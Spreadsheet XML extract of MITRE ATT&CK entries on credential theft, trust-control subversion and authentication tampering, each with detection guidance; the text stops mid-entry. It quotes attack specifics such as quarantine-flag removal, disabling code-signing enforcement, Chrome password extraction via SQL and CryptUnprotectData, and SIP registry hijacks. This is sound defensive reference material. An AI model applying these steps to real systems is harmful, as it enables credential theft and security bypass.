Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Unsecured Credentials: Group Policy Preferences</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/006</t>
  </si>
  <si>
    <t>17 June 2020</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>Unsecured Credentials: Container API</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)
An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Jay Chen, Palo Alto Networks; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t xml:space="preserve">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
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec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deselected.(Citation: SpectorOps Subverting Trust Sept 2017)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t>
  </si>
  <si>
    <t>Anti-virus, Application control, Autoruns Analysis, Digital Certificate Validation, Process whitelisting, User Mode Signature Validation, Windows User Account Control</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended attribute (xattr) called &lt;code&gt;com.apple.quarantine&lt;/code&gt; can be set on the file by the application performing the download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined binary, often using the &lt;code&gt;dlopen&lt;/code&gt; function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing Gatekeeper)
The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in, a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any application or user with write permissions to the file can change or strip the quarantine flag. With elevated permission (sudo), this attribute can be removed from any file. The presence of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; quarantine flag can be checked with the xattr command &lt;code&gt;xattr -l /path/to/examplefile&lt;/code&gt;. Similarly, this attribute can be recursively removed from all files in a folder using xattr, &lt;code&gt;sudo xattr -d com.apple.quarantine /path/to/folder&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper bypass 2021)
Apps and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the &lt;code&gt;curl&lt;/code&gt; command do not set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag when performing updates. 
Review &lt;code&gt;false&lt;/code&gt; values under the &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry in an application's &lt;code&gt;Info.plist&lt;/code&gt; file (required by every application). &lt;code&gt;false&lt;/code&gt; under &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry will default to not setting the quarantine flag. 
QuarantineEvents is a SQLite database containing a list of all files assigned the &lt;code&gt;com.apple.quarantine&lt;/code&gt; attribute, located at &lt;code&gt;~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2&lt;/code&gt;. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing</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</si>
  <si>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macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) 
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Subvert Trust Controls: SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps</t>
  </si>
  <si>
    <t>Application control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Install Root Certificate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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>25 August 2021</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>22 February 2021</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>23 April 2021</t>
  </si>
  <si>
    <t>26 April 2021</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</si>
  <si>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</si>
  <si>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Abel Morales, Exabeam</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation, User Mode Signature Validation</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</si>
  <si>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Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1554</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system,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</si>
  <si>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https://attack.mitre.org/techniques/T1555</t>
  </si>
  <si>
    <t>21 June 2021</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</si>
  <si>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</si>
  <si>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Credentials from Password Stores: Keychain</t>
  </si>
  <si>
    <t>Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>12 February 2020</t>
  </si>
  <si>
    <t>17 February 2020</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Securityd Memory</t>
  </si>
  <si>
    <t>An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)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
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/003</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</si>
  <si>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</si>
  <si>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Barry Shteiman, Exabeam; RedHuntLabs, @redhuntlabs; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Windows Credential Manager</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted &lt;code&gt;.vcrd&lt;/code&gt; files, located under &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as &lt;code&gt;CredEnumerateA&lt;/code&gt; to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>29 April 2021</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</si>
  <si>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</si>
  <si>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Bernaldo Penas Antelo; Mugdha Peter Bansode</t>
  </si>
  <si>
    <t>Credentials from Password Stores: Password Managers</t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)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disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>22 January 2021</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Matt Burrough, @mattburrough, Microsoft</t>
  </si>
  <si>
    <t>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By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence</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</si>
  <si>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
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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</si>
  <si>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Chris Ross @xorrior</t>
  </si>
  <si>
    <t>Modify Authentication Process: Domain Controller Authentication</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
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t>
  </si>
  <si>
    <t>Modify Authentication Process: Password Filter DLL</t>
  </si>
  <si>
    <t>Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. 
Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>Modify Authentication Process: Pluggable Authentication Modules</t>
  </si>
  <si>
